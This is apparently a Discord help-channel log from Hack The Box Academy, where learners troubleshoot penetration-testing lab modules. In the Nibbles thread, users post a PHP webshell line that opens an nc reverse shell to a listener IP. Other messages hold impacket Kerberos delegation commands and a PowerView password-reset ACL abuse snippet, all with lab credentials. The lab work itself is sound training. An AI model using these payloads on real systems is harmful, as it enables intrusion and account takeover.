#modules

1 messages · Page 377 of 1

pine dune
#

Hi guys

#

whats wrong with this

#

it worked before

safe star
#

just click the app

pine dune
#

ok cool but why doesnt it work anymore? I found it easier this way. Whats up with my terminal?

pine dune
safe star
#

update or reinstall

#

i just use caido now

pine dune
#

sudo apt update?

pine dune
safe star
#

feels like a better community burp

#

no rate limits

safe star
pine dune
#

ok cool ill try

#

thanks bro

#

im getting these errors

#

i cant upload images here for some reason

safe star
#

dm it

flint palm
#

Nobody can tell me how to connected HTB-Corp network?

fathom pendant
#

Ah missed your early message

#

You have to connect to the target machine first

flint palm
#

I have connected already but I can't login into HTB-Corp with the password sentinal

#

Connect to the WPA-Enterprise Wi-Fi network named "HTB-Corp" with username "HTB\Sentinal" and password "sentinal". Once connected, locate the flag at the IP address 192.168.3.1. I am stuck here

fathom pendant
#

Weird that it's sentinal and not sentinel

dark hedge
#

that's because it's the name of an HTB staff member

fathom pendant
#

But meh i haven't touched the wifi stuff

dark hedge
#

they are probably the author of the module

flint palm
#

No it is sentinal there the password

fathom pendant
flint palm
#

I did the configuration file opened it but it is not connecting... can't understand what's wrong....

#

Their emulation is working so slow that reminds me times when maximum operative memory was about 512 Mb

dapper moth
#

Why don't you connect via GUI?

flint palm
#

I am connecting via GUI but it asks me for password

dapper moth
#

Haven't you said you already got a pass?

flint palm
#

I know that I have a pass but it is not working

dapper moth
#

Which module is this?

fathom pendant
flint palm
#

Wi-Fi Penetration Testing Basics

dapper moth
#

Section would be nice

#

If it's the SA, there might be something not allowing you to connect

flint palm
#

Connecting to Wi-Fi Networks

dapper moth
#

This one is via wpa_supplicant and config file indeed

flint palm
#

I did the config file and still nothing....

#

Config file should active it itself right?

dapper moth
#

I just ran the commands and they work fine

#

Make the config file with the parameters in the question and run the commands from the "Connecting to WPA Enterprise" part in sequence

ripe wadi
#

on login brute forcing module should i be trying to log in as Jane Smith

flint palm
#

ok after the config file opening what other commands I should run?

dapper moth
#

Have you set your config file with the username and password provided?

#

sudo wpa_supplicant -c wpa_enterprsie.conf -i wlan0

#

It should connect you to the wifi network

fluid mist
#

guys I need help

#

I cant finish this part

fathom pendant
fluid mist
#

Bro im trying to send it lol

#

i swear

fathom pendant
#

You can't send images

fluid mist
#

ok Module 77, Section 726

fathom pendant
#

Your account isn't linked

#

Module and section numbers mean nothing to me

fluid mist
#

ohh makes sense, I wanted to send a pic

fathom pendant
#

If you wanna send an image you need to link your account via #welcome

fluid mist
#

so how do I explain?

fathom pendant
#

That's not really an "exercise" as it is an example

fluid mist
#

its called "getting started"

uneven niche
fathom pendant
fluid mist
#

Im doing service scanning

fathom pendant
#

And what are you having issues with

fluid mist
#

3rd question: List the SMB shares available on the target host. Connect to the available share as the bob user. Once connected, access the folder called 'flag' and submit the contents of the flag.txt file.

fathom pendant
#

In the format user:password

fluid mist
#

I wanted to send a picture for some reason even with steps its not working

#

yes it show "bob:Welcome1"

fathom pendant
#

When connecting to a share, don't use -L

fluid mist
#

I didnt use it

#

ill send the line I started with

#

smbclient -U bob \\10.129.19.169\users

#

it got removed

#

the back slashes

fathom pendant
#

Put a ` at the front and back of the command to avoid discord formatting

#

Yeah because \ is an escape character

fluid mist
#

in the code its 4 back slashes before the Ip and 2 before User

fathom pendant
#

Yes

fathom pendant
#

I'm aware, but is that the available share you need to connect to?

#

Did you list shares before attempting to connect?

fluid mist
#

"smbclient -U bob \\10.129.19.169\users"

fathom pendant
#

That's quotes

fluid mist
#

'smbclient -U bob \\10.129.19.169\users'

fathom pendant
#

Not backtick (`)

frigid spoke
#

Hello, on this server people help about cheat games or this is not this type of server

fluid mist
#

ill just copy you bro

fathom pendant
frigid spoke
hushed rivet
#

there is game hacking though

fathom pendant
hushed rivet
#

probably not the one u looking for though

fluid mist
#

smbclient -U bob \\\\10.129.19.169\\users

fathom pendant
frigid spoke
fathom pendant
hushed rivet
#

challenges

#

on the site

fathom pendant
frigid spoke
hushed rivet
#

there are also challenges

fluid mist
fathom pendant
#
fluid mist
fathom pendant
hushed rivet
#

do a -L first

#

to see what shares there are

fluid mist
fathom pendant
#

Also you can instead do //ip/share

fathom pendant
#

Note the password is Welcome1

fluid mist
#

when I try to capture the flag text it says no command available

fathom pendant
#

That's... odd so it sounds like it connects you

fluid mist
#

yea its weird thats my only issue

fathom pendant
#

What is the command you're using to try and get the flag?

fluid mist
#

everything else is good

fathom pendant
#

Is the flag in a subdirectory?

fluid mist
#

yes it is

#

cat flag.txt

fathom pendant
#

Cat isn't an smb command

uneven niche
#

I can't even remember the payload I was using that was confusing me I'll just move on 😂

fathom pendant
#

Try more flag.txt

fluid mist
fathom pendant
#

Or get flag.txt

fluid mist
hushed rivet
#

get flag.txt should work

fathom pendant
#

Then after you download it, exit the smb session and do cat flag.txt

fluid mist
hushed rivet
#

good job

fluid mist
#

"getting file \flag\flag.txt of size 33 as flag.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)" is my prompt

fluid mist
fluid mist
fathom pendant
#

Yes

quasi flint
#

Just finished the SQLMap Essentials module, and got the final flag, but it won't accept it as the answer - flag looks legit. I tried logging in and out with no success. Anyone ever have a module that won't accept the found flag?

fluid mist
#

ok ill try now

hushed rivet
#

see if there is no space in flag @quasi flint

quasi flint
#

no space before or after

hushed rivet
#

also when u paste in the field

quasi flint
#

I even tried typing it in again

fathom pendant
quasi flint
#

It is leet speak

fathom pendant
#

@fluid mist don't share the flag dumbass

fluid mist
#

didnt know

#

Appreciate the help still

fathom pendant
#

Use brain

fluid mist
#

I was too euphoric that I passed and forgot

#

100% my fault, never again

quasi flint
#

Thanks for the help anyhow. I will reach out to support I guess.

limpid dawn
#

Hello everyone not really a modules question but I was wondering if any one has used the annual subscription and is the step by step question guide worth it I haven’t needed it yet? Thank you for any opinions.

fathom pendant
#

The authors like to rely on msfconsole/proxy for their pivoting stuff (which is interesting) but I prefer using ligolo

limpid dawn
#

Appreciate it

fathom pendant
#

But i wouldn't rely on the walkthrough to do much explaining beyond what was in the reading

quasi flint
foggy monolith
#

Kerberos Attacks § Constrained Delegation from Linux

The ticket retrieved by :
impacket-getST -spn TERMSRV/DC01.INLANEFREIGHT.LOCAL 'INLANEFREIGHT.LOCAL/beth.richards:B3thR!ch@rd$' -impersonate Administrator
is giving me KDC_ERR_PREAUTH_FAILED when I try to use it. Why?

safe star
#

bad password or user?

foggy monolith
#

Nope, actually it was failure to leave /etc/hosts alone. Specifying -dc-ip and -target-ip instead of editing configuration files fixed the problem.

tacit pike
#

Hi guys, I need help accessing hackthebox to do labs. I logged in and went to labs and this appears, any ideas?

tacit pike
#

network error

fathom pendant
vital marlin
#

issue with Debugging section of Malware Analysis:

sudo inetsim
INetSim 1.3.2 (2020-05-19) by Matthias Eckert & Thomas Hungenberg
Main logfile '/var/log/inetsim/main.log' does not exist. Trying to create it...
Error: Unable to create main logfile '/var/log/inetsim/main.log': No such file or directory.

did all the preceding steps correctly...suppose I'd have to set this up on one of my own VMs as the module seems to suggest it won't work properly on a pwnbox?

safe star
#

you transfer it from your machine

#

just download it on your machine then copy it to the rdp session

#

yes that can work too

#

i just copied and pasted it

quick cosmos
#

I'm doing skills assessment for cme , i connected to the target environment using chisel client , when I'm doing anything using proxychains in the target environment I'm getting a socket error or timeout

cloud urchin
#

sounds conifugration related

steel snow
#

Hello! excuse me:

for footprinting module SNMP section i get the question:

"Enumerate the custom script that is running on the system and submit its output as the answer"

#

i am really confused

#

what is it really asking us to do?

fathom pendant
#

It'll be obvious once you see it

steel snow
#

i did :P i did the other 2 questions, but like am i supposed to put the custom script name as an answer?

steel snow
#

because what i understood it now is there is a custom script running aka process

#

and the number of processes running is soooooo big

fathom pendant
fathom pendant
steel snow
#

right, but my understanding then is correct, it's a process that is running

fathom pendant
#

It's a process/script that had already been run and logged on the server

steel snow
#

hmmmmmmm, thing is, when you say "submit its output as the answer"

fathom pendant
#

Because it's output is logged

steel snow
#

yess

#

ah right hmmmmm

fathom pendant
#

Running implies that it is currently active

steel snow
#

i didn't know that SNMP registers logs

fathom pendant
#

That's literally what snmp is for

#

Simple Network Management Protocol

steel snow
#

i thought it monitors online devices hmmmm

fathom pendant
#

Yes, it monitors and logs

steel snow
#

it's just the lack of real use of one

#

thank you!

fathom pendant
#

Be a shitty monitoring tool if it didn't log what it monitors

#

Don't ya think?

steel snow
#

well, i don't quiet understand what exactly it's monitoring

#

as i said, i lack the experience with the service

fathom pendant
#

It's monitoring for activity on the device

steel snow
#

interesting, okay thank you, but hmmmm, would that mean

#

SNMP is used a lot with IDS or something?

fathom pendant
#

It can be

#

Usually it's installed/running on routers/switches/servers

steel snow
#

also i have a question, sometimes i see a question and i want to do something, but maybe some tool wasn't discussed, are we supposed to go online and search for such tools?

fathom pendant
#

It's not often something like that happens

steel snow
#

sure, right, but it did happen i forgot what tool i had to search for

fathom pendant
#

But getting information from multiple sources is helpful

steel snow
#

but is that an intended goal? is that considered cheating?

fathom pendant
#

How would it be cheating?

steel snow
#

well, it makes the question easier since i am using a tool that wasn't discussed

#

for me, it feels a bit like cheating, but am i to learn by myself?

fathom pendant
#

Most of the times the tools required are what's discussed, but they aren't the only available tool for the job

steel snow
#

so, am i encouraged to do such a thing? because i love doing that, but i end up usually contraining myself to what was discussed in a module

clever topaz
#

ppl say if we do AEN blindly, we would be considered prepared for CPTS? but what if i spend a 4-5 days doing AEN with around 10 hours per day...

steel snow
#

constraining*

fathom pendant
fathom pendant
#

The pivoting module doesn't go over ligolo-ng but that's been my goto for pivoting

#

It doesn't hurt to learn more tools if you find one that does the job better or just works better for you

steel snow
#

excuse me @fathom pendant sometimes, the OIDs has weird random number values, what do they represent?

fathom pendant
#

Utilize google

steel snow
#

absolutely, hahahaha, sometimes i just find it better to talk with someone if i had someone

fathom pendant
#

Can't be bothered to explain it

steel snow
#

No worries! i will, thank you!

fathom pendant
#

Especially since they're not necessarily random

thin parrot
#

Weird question but why does this curl PUT not work?

#

||curl -X PUT http://94.237.59.180:41735/api.php/city/fort_worth -d '{"city_name":"zag", "country_name":"zag"}' -H 'Content-Type: application/json'||

#

For context I'm trying to figure out how to refer to a city in a header obviously I cant use an empty space

#

The city_name stored in the table is "Fort Worth" so my assumption is that the space should be replaced with an underscore and no caps lock

fathom pendant
thin parrot
#

I tested this with a city name without a space and got the expected result

#

This is CRUD no?

fathom pendant
#

Also make sure you know how it's calling the endpoint

#

Are you sure it's calling it as fort_worth

thin parrot
#

If you look it up as "fort_worth" yes

#

I cant upload the image but it returns the JSON string

#

With the full name, country

fathom pendant
#

Did you try with -X update?

thin parrot
#

I mean I could but that would create the entry on the assumption that the entry does not exist

#

but I'm specifically trying to figure out how to refer to an entry that has a space in the name

#

I really thought it would be an underscore and I'm struggling to figure out how to google this question

#

(I mean I did google it but was simply told "_")

#

I know I'm going to run into this issue in the future, at some point, and would love to know why this is not working when the endpoint is specifically "fort_worth'

#

but when used with CRUD API is not working, but will if it lacks a space character (hence me being able to modify city names like london to something else with the exact same parameters)

digital pendant
#

I must be missing the obvious here. Footprinting medium assessment lab;

I've got the solution infront of me, copied exactly the format over to pwnbox (tried both written and pasting password) but i seem to fail to reach the devshare that I need... any thoughts/help?> pls

unreal berry
#

where are the recommended boxes in the end of each module ?

#

can someone snapshot the location ?

#

the only thing i see is the Academy X HTB Labs universe

jolly widget
#

can anybody tell which option is used to generate standalone payload in msfvenom?

minor cosmos
#

Hello! Is this a right place to ask questions about module "ACL Abuse Tactics" (related to CAPE cert)?

jolly widget
#

yes

minor cosmos
#

When I try to execute the Set-DomainUserPassword command (copied from listing no. 3 in this module), I receive the warrning:

WARNING: [Set-DomainUserPassword] Unable to find user 'damundsen'.

Any idea why? I don’t see any typo or similar issue there.

#

For clarity, I understand what the message means, but the entire module is designed for this user. So, if he don't exist, I'm not entirely sure how I am supposed to complete this module and do the exercises.

jolly widget
#

what was your full command

minor cosmos
#

$SecPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\wley', $SecPassword) $damundsenPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force Import-Module .\PowerView.ps1 Set-DomainUserPassword -Identity damundsen -AccountPassword $damundsenPassword -Credential $Cred -Verbose

jolly widget
#

command looks fine to me..

#

have you tried restarting the machine

minor cosmos
#

you mean the "target"?

jolly widget
#

yes

minor cosmos
#

will check once again now

#

same with new target

#

"unable to find user 'damundsen'"

#

Since I’m new, I’d like to ask if there’s another place where I can report this?

jolly widget
#

on the modules itself there is small icon on the bottom right, there u can create a ticket

#

but before that I would say restart the target, and between the restart wait for 5 min

urban elk
minor cosmos
#

@urban elk Hi, I’m fully aware that this might sound like a newbie question, but yes, this module specifically revolves around this particular user, which is why I’m asking.

urban elk
#

just covering the basics. Hope you get some help

wraith pewter
#

If I buy a htb academy giftcard how can I activate it and can I use it to buy accademy one month subscription?

urban elk
minor cosmos
#

for now I'm going to the next module, I've already wasted too much time on this one

storm elk
#

do not join @minor cosmos

#

this is a scammer

urban elk
#

don't, clearly not

minor cosmos
#

lol

#

that was close

#

ok, no more s**t posting, Thanks for help @urban elk & @storm elk

storm elk
#

HTB won't post links to separate discords

dapper moth
delicate zinc
#

Hello can anyone tell me how to subscribe in the student plane , if I don’t have a student mail they don’t provide us with an email

minor cosmos
dapper moth
#

Did you use the DN or the Domain flag? You can also use Get-DomainUser in the Identity

#

Check if you can run Get-DomainUser damundsen separately

#

Then try changing to the full command

dapper moth
#

If you can’t find the user for whatever reason even after querying for the user only, I’d suggest restarting the env

#

You can also dump the users in Linux to see if there is any problem with the environment or if it’s just something with your Windows session

autumn pilot
#

You need to specify the password for the user wley

minor cosmos
sly gust
#

what happens if im in the middle of a module and my student subscription runs out?

storm elk
#

the module will get locked

minor cosmos
#

@autumn pilot something is wrong, wmiexec.py inlanefreight.local/wley:'<here password with 4 as last character>'@172.16.5.5

#

result: rpc_s_access denied

dapper moth
#

Not my case, since I got monthly and there are only 4 modules to unlock, but it’s always good to know

storm elk
#

completed modules will be yours forever

#

if you bought them with cubes - then they are yours too

dapper moth
#

I meant if you’re in the middle of a module unlocked by annual subscription

rustic sage
#

hello

bright ridge
#

hello

swift wagon
#

hi

hasty rover
#

Information Security Foundations. And guides and tips for the information. I’m currently on Windows Command Line . Passed Linux and Windows Fundamentals but that’s because there were guides on YouTube that explained thoroughly. If anyone can get advice or tips that’ll be great.

dark hedge
#

new module

turbid drum
#

No

dark hedge
#

uh, okay

rustic sage
#

That moment when you solve the entire module and you’re just sitting there like fuck that was hard

remote latch
dark hedge
remote latch
dark hedge
remote latch
dark hedge
#

i think it's better that way

remote latch
remote latch
#

Like...an official HTB document

#

It's def used for other stuff than OSINT

dark hedge
#

yea it's probably used in AD Enum & Attacks... for looking up domain info

remote latch
#

There

dark hedge
#

yea this is from the Documentation & Reporting module

remote latch
#

But they chose not to

#

😭

dark hedge
#

you already have AEN

#

plus making vulnerable web apps public and indexable by google isn't a good idea anyway

remote latch
dark hedge
#

Attacking Enterprise Networks

#

full fledged network

remote latch
#

No way, haven't started it

dark hedge
#

it's the capstone module for the Pentester Path

remote latch
dark hedge
#

it's bigger than that sample report you dug up.. which i'm going to delete since that's spoiling Tier II module content

remote latch
dark hedge
#

which it shouldn't be.. you should report it

#

/spoiler

remote latch
#

Submitted it tho

rustic sage
#

I really got my ass handed to me

#

Web app is my weak point. Doing cbbh then oSCP july, just wanted to take a pity stop

#

Pitt stop*

heavy solar
#

Hey Can you help me with this problem. Questions

Answer the question(s) below to complete this Section and earn cubes!

Target(s): 10.129.197.240 (ACADEMY-NIXFUND)

Life Left: 91 minute(s)

SSH to 10.129.197.240 (ACADEMY-NIXFUND) with user "htb-student" and password "HTB_@cademy_stdnt!" I was trying to connect but to ssh . But it is not connecting. I am solving Academy Modules

old thorn
#

Hola hola buenos días algun modulo para hacking etico en español

shut vapor
#

I believe english is encouraged... and required in my case. 🙃

shut vapor
fathom pendant
old thorn
#

Gracias

rustic sage
#

I've a problem with the pwnbox

#

In modules the commands don't match the answers

fathom pendant
#

If they did, there would be no reason to have the exercises as you could cheat your way through

rustic sage
#

I know my question is for example in linux module there was a question about the kernel version and when I did the command, copy and paste the output it didn't work

fathom pendant
#

The pwnbox != the target

rustic sage
#

Can I do it all on the pwnbox or I've to use openvpn

fathom pendant
#

You can connect to the target from the pwnbox

#

The pwnbox is automatically connected to your selected vpn region

rustic sage
fathom pendant
#

I always push for people to use their own vms, more control over tools installed, persistent storage, can utilize it for more than htb

rustic sage
fathom pendant
#

Yep

#

But vbox and vmware both have drag & drop capabilities

#

So you can download on your main os and drop the vpn file into your vm

rustic sage
#

That is good

fathom pendant
#

I suggest using netexec in the future

#

But it's a full error, so I suggest investigating further with evil-winrm

#

Also deleting message bc potential spoiler

potent sandal
#

when i do evil-winrm he shows me also a error message

#

i think is the connection to that machinbe

fathom pendant
#

Then restart the machine, wait a few minutes, then attack/connect

foggy monolith
#

Kerberos Attacks § RBCD from Linux

impacket-rbcd -dc-ip 10.129.205.35 -t DC01 -f ATTACKER inlanefreight\\carole.holmes:Y3t4n0th3rP4ssw0rd
\Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

usage: rbcd.py [-h] -delegate-to DELEGATE_TO [-delegate-from DELEGATE_FROM] [-action [{read,write,remove,flush}]]
[-use-ldaps] [-ts] [-debug] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key]
[-dc-ip ip address]
identity
rbcd.py: error: the following arguments are required: -delegate-to

The module examples use an outdated version of impacket, so what's the updated syntax of this command?

broken lotus
#

I don't know where I have to ask it but can anyone help me in private to resolve EscapeTwo of HTB, pls ?

foggy monolith
fathom pendant
broken lotus
#

thanks

kindred plinth
#

hi chat

fathom pendant
lunar lance
#

how to solve this, "Use NSE and its scripts to find the flag that one of the services contain and submit it as the answer."

#

module : nmap scripting engine

fathom pendant
#

I suggest starting with the ones in the example first

lunar lance
#

ok bro will update if it works

cloud urchin
#

that said, your error shows exactly which argument is missing

rustic sage
foggy monolith
swift wagon
#

i am on module "Getting Started", "nibbles" page
listen on my port, upload my image.php
curl the php
but i don t have the reverse bash
some one can help me ?

fathom pendant
#

Did you put your tun0 ip and port in the php?

swift wagon
#

yes

#

<?system ("rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.238 2727 /tmp/f");
system('id'); ?>

#

and
sudo nc -lvnp 2727

#

the id line don t write out

fathom pendant
#

That's fine

#

But does it connect

swift wagon
#

Ncat: Version 7.95 ( https://nmap.org/ncat )
Ncat: Listening on [::]:2727
Ncat: Listening on 0.0.0.0:2727
Ncat: Connection from 10.129.120.222:58554.
/bin/sh: 0: can't access tty; job control turned off
$

fathom pendant
#

You're connected

#

Don't worry about the id not printing

swift wagon
#

if i type some thing no return

fathom pendant
#

Wdym "no return"

#

You may need to upgrade the shell
python3 -c 'import pty;pty.spawn("/bin/sh")'

swift wagon
#

i follow the curse :
$ python -c 'import pty; pty.spawn("/bin/bash")'

#

but nothing print
and no prompt ($)

#

i can t post screen

fathom pendant
#

If you wanna post screenshots follow #welcome

swift wagon
fathom pendant
#

Press enter again

#

Also best to specify python3

swift wagon
#

it s like no return from distant

#

i try reset target

#

3 times

shut vapor
#

try entering a command

novel parrot
#

hi am having issues with the vm pwnbox (hosted locally):

$ ncat -nv --source-port 53 10.129.2.28 50000
bash: ncat: command not found

i tried upgrade /installing both netcat traditional and openbsd

swift wagon
swift wagon
#

ho my......
so many time and change

#

loose the second ">" when i insert port .............

novel parrot
#

try saving this and btw you forgot the > before the /tmp

<?system ("rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.238 2727 > /tmp/f"); ?>
swift wagon
#

yes working ans chalence done

#

thanks

#

my eyes are bored

novel parrot
bitter ridge
#

Anyone else getting kicked off vpn over and over

#

well off my SSH

fathom pendant
#

Change vpn regions

bitter ridge
#

that didnt help killed my connection right away ill try TCP

viscid patio
#

How are you all

#

By the way, I'm new with you

#

Are you welcome?

bitter ridge
#

I am very welcomed

fathom pendant
#

Also make sure you only have one vpn running

viscid patio
#

I want to know if this group has people who can teach me how

bitter ridge
fathom pendant
bitter ridge
compact patrolBOT
bitter ridge
#

even my pwnbox ssh is timing out

fathom pendant
#

Don't run pwnbox and your own vm at the same time

bitter ridge
#

ill reboot my pc that fixes all the things

fathom pendant
viscid patio
#

🙏🏻Can I talk to one of you in private and explain to me and ask him questions?

fathom pendant
#

If you need help with an academy module you can ask here

still edge
#

Someone did the footprinting ftp page not the lab ?

fathom pendant
#

?

#

What's your actual question

still edge
#

Is there a way to show the flag.txt ? I got both question but i dont feel right to have tried something and got it

viscid patio
#

Can someone just tell me where to start learning hacking

viscid patio
#

I want steps?

fathom pendant
#

Read that

fathom pendant
fathom pendant
# viscid patio I want steps?

Each scenario will be different, the article is a good starting point to understand. And atp I wouldn't wanna take you on even if you paid me

still edge
#

The only thing i see when i go on the ftp is ftpuser ftpuser there a file called flag.txt i got it but hiw would i have known if it werent for the question that file was there

fathom pendant
#

If you can't be bothered to read an article titled "beginners bible" then you're just gonna infinitely frustrate me

fathom pendant
#

You can ls and dir in ftp

still edge
#

I did a ls -R 3ven ls but it only show ftpuser

fathom pendant
#

You can cd

#

¯_(ツ)_/¯

fathom pendant
viscid patio
#

@fathom pendant Sorry

fathom pendant
#

I've given you all the basic info

#

And at this point you sound like a leech that's just gonna go "and then?" After being told to do something instead of doing any legwork yourself

#

Htb academy has plenty of learning modules, and even an intro to pentesting module

viscid patio
#

Can I speak?

silk flicker
# viscid patio I want steps?

Isn't just better to go for the basic paths like cracking into htb that give you things to learn to really start ?

fathom pendant
#

This channel is for help with the htb academy modules

still edge
#

@fathom pendant my bad iwas just dumb and no observant i forgot the file name is at the end

viscid patio
#

I just want the direct site that I can learn from

fathom pendant
#

That's one site you can learn from

viscid patio
#

@fathom pendant Thank you very much ♥

fathom pendant
#

It's not 100% free

glossy cloak
#

Hey all... noob here lol

fathom pendant
#

But the beginner modules (tier 0) are all free

viscid patio
#

@fathom pendant Should I open the link you sent me on Google? Or there is a private, protected site

fathom pendant
#

?

#

The link can be opened in any browser

viscid patio
#

I said maybe it should be opened in a protected location like Tor

fathom pendant
#

It doesn't need to be

#

And Tor is useless if you're gonna be signing in to an authenticated service anyway

viscid patio
#

Are you a manager here?

fathom pendant
#

No

viscid patio
#

You are good at treating yourself and being kind 🌹

#

@fathom pendant

fathom pendant
#

Please don't @ me

viscid patio
#

Your account is beautiful

#

The important thing is that I want someone here to help me, because there is someone with a white heart who can teach me in private 🙏🏻

cloud urchin
#

i doubt you'll find that here, this channel is for discussion about HTB's Academy platform, so most people are learning from that, not private tutoring

glossy cloak
#

where I can ask about pwnbox time... I dont have any time left... :/

cloud urchin
#

This says it's for labs, but I think it applies to academy too:

  • Free Users have a single two hour session of Pwnbox available for the life of their account, as a way to test out it's features. Free users also have limited internet access, with only our own target systems and GitHub being allowed.

  • VIP users have a limit of 24 hours per month to use their Pwnbox. This limit gets renewed with each month that you renew your VIP Subscription

  • VIP+ users have unlimited use of Pwnbox.

quasi wave
#

hi I have been stuck on attacking SMB service section from Attacking Common Services module for several days. I got the the rpcclient part where I'm logged in but none of the commands work. This is for question 3. I already completed questions 1 and 2 so I don't need help with those.

#

can someone help me out here? I took a few days off because of the fires

#

but a few days ago I tried for like three days

#

can someone help me out with next step?

#

I know I can log in as the right user via rpcclient and I know which SMB ports are open but other smb tools don't work for logging in only the one tool

#

I hope I'm not spoiling anything I'm trying to be vague.

#

I need to know how I get the commands to work via RPC

#

can someone DM me?

glossy cloak
#

@cloud urchin I cant use openvpn as an alternative?

cloud urchin
weary owl
#

that kerberos skills assement was about 1000% times easier than i was expecting

safe star
#

if you can answer questions 1 and 2, 3 should be no problem at all

#

you found the share but didnt check it?

bitter ridge
#

I think one of my brain cells dropped a packet, when it says local VM is that referring to the PWNbox or the VM i connect to via SSH? Either way those are not local

cloud urchin
#

depends on the context

bitter ridge
#

It is highly recommended to set up our virtual machine (VM) locally to experiment with it. Let us experiment a bit in our local VM and extend it with a few additional packages. First, let us install git by using apt.

bitter ridge
#

Ok sounds like its time to spin another one up

safe star
#

pwnbox already has what you need

#

but if you use kali or parrot the default settings should be fine

bitter ridge
#

Ok just another confusing line in these trainings. It makes it sound like the practice of installing it is a good idea (which i think it is) but if its already done and I dont have to start my own VM

quasi wave
#

this week has been very stressful

safe star
quasi wave
#

I mean I have had vacations kind of but a lot of evacuating and driving all over the place

bitter ridge
safe star
bitter ridge
#

np ill move on, I have parrot OS VM on my PC was just going to start another but not gunna spend the time trying to get mine setup if their's is already working appropriately

safe star
#

the tools shown are already installed by default, thats just for any future tools you want to install

bitter ridge
#

ok

quasi wave
#

can I DM with someone in like an hour? I think I need to start the section over and eventually I think I will need someone to help me through the last step which is what I think I'm at

#

or maybe I can DM someone tomorrow night? is that possible?

simple zephyr
#

Kerberoasting from Linux

What is Adam's password, a Kerberoastable account?

I am not getting Adams account
||

 impacket-GetNPUsers inlanefreight.local/htb-student:'HTB_@cademy_stdnt!'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

Name         MemberOf  PasswordLastSet             LastLogon                   UAC
-----------  --------  --------------------------  --------------------------  --------
amber.smith            2023-03-30 06:40:23.135840  2025-01-17 14:42:20.567899  0x410200
jenna.smith            2022-10-14 05:00:00.581111  2025-01-17 14:42:20.739757  0x410200
carole.rose            2022-10-14 05:00:03.377990  2025-01-17 14:42:20.927255  0x410200

||

simple zephyr
#

lol

#

i just noticed that

quasi wave
#

I got the the public key to log in via ssh and I am trying to log in after importing it and it won't let me

#

I am trying to ssh in as the user. this is for question 3 of same module I have been on

cloud urchin
#

you can't use the public key for ssh you need the private key

quasi wave
#

ok I think I have private key actually

#

its id_rsa

#

its denying permission to log in based on having too much permissions

#

what is the right chmod command to make this work?

#

do I just play around with permissions?

#

maybe it is private key because it says permission denied (public key)

#

I'm confused

#

I have file saved on pwnbox tho

cloud urchin
#

chmod 600 for a private key

#

first couple results in google explain it

quasi wave
#

wait I logged in

#

I have the flag

#

I finished the section

#

thank you for your help

fluid lantern
#

holy moly Using Web Proxies: ZAP Fuzzer is probably the most broken lab i've come across so far

#

i've had to reset it 4 times just for 2 separate services (even the flag) just to show up using the same command😭

fathom pendant
fathom pendant
#

No, you don't

waxen totem
fathom pendant
#

The big thing is it looks for group and other perms

waxen totem
#

I precisely remember telling him to put it in his notes

pine dune
fathom pendant
#

If they are anything other than 0, ssh says "something isn't right"

#

Why does a file that gets read need to be executable?

pine dune
#

yea mb, Idk why I was doing that 😂

waxen totem
#

less than a month

#

@quasi wave get your shit together

fathom pendant
waxen totem
#

I mean I don't always remember to change the perms but when ssh says so: I quickly realize my stupidity

fathom pendant
pine dune
#

Hi, whats a good way to actually remember the things you learn from htb. I take notes but don't visit them (it's just as if I'm collecting notes but not returning to them). So when I have like 15 sections (and subsections within those sections) of notes, whats a good strategy/timetable to revisit the notes in a breathable manner?

waxen totem
#

And revisit those notes

#

I like revisit: 1day 1 week 1 month

#

Make a sheet or something , I use notion automation to tell me which notes to review

#

And my review doesnt consist of reading the notes it consists of recreating it as much as possible

#

(Mainly cos my notes are mind maps)

pine dune
pine dune
#

I use Obsidian

fathom pendant
#

There's probably a plugin

pine dune
#

ahh ok Ill have a look

pine dune
#

Ill try find a relatable plugin

fathom pendant
#

A lot of what I remember is from helping others

#

Also a good way to engage with stuff isn't "what is the right way," it's ruling out "why is this the wrong way"

pine dune
waxen totem
fathom pendant
#

Strats i learned in ap-psych 10+ years ago

pine dune
fathom pendant
#

Yep

pine dune
#

nice

#

I did a level psychology like in 2016

waxen totem
#

Also makes it so I only have to review notes from at most 3 days , unlike when I was doing flashcards, oh God

pine dune
#

was just memorising a shit ton of case studies lol

fathom pendant
#

The benefit to explaining to yourself why the wrong answer is the wrong answer is it not only reinforces the right answer, it affirms your knowledge around the subject

#

This is generally more applicable around MC questions

pine dune
#

ahh I see

fathom pendant
#

But can be applied to methodology

pine dune
#

sounds like it

fathom pendant
#

Scan, find a web page -> rule out which tools to utilize

waxen totem
#

I mean everything is multiple choice if you reframe it to be

fathom pendant
#

Enumerate page -> rule in which tools are a better scalpel

waxen totem
#

Also did you just describe process of elimination in a way that made me think it's something else?

fathom pendant
#

Hacking is just a problem to solve, eliminate where you can to narrow in on what you should try

#

It's why I'll engage with someone using a wrong tool or doing something odd with a certain tool with "why?"

#

It allows for the building of the critical thinking aspect

#

Shifting from "well this is the tool I'm meant to use" to "well x framework is here and y tool is best for it"

rustic sage
#

Who’s taking cpts next week?

fathom pendant
#

Shortcuts i took in web modules:
Public_ip:port == no revshell

rustic sage
#

I feel so stressed i need to be confident 🤝

waxen totem
#

This whole time I've been using pywhisker pkinit, where venvs are pain

fathom pendant
fathom pendant
rustic sage
waxen totem
fathom pendant
rustic sage
#

I have quick question i cant do pro labs , what do recommend for others free labs?

rustic sage
fathom pendant
#

Well can't recommend any free active labs due to spoilers and such

fathom pendant
#

But the best bet is to review the course material

waxen totem
#

Full house is full atm afaicr

rustic sage
#

I will redo the skill assessment?😍

fathom pendant
#

Make sure you understand why a tool was used, what situation a tool is used in, and things of that nature

#

Try and tackle some of the skill assessments in a different manner than you did initially

fathom pendant
#

Make sure you know of backup plans of how to attack something just in case your go-to tool fails

waxen totem
rustic sage
fathom pendant
#

Troubleshooting tool issues sucks, even more when you're on a time crunch

waxen totem
long kestrel
#

Got top 5 😁

rustic sage
waxen totem
fathom pendant
waxen totem
#

man's so locked in he can see all the errors

fathom pendant
#

I get curious when it lights up

#

And see if it's a skill issue or actual issue

waxen totem
#

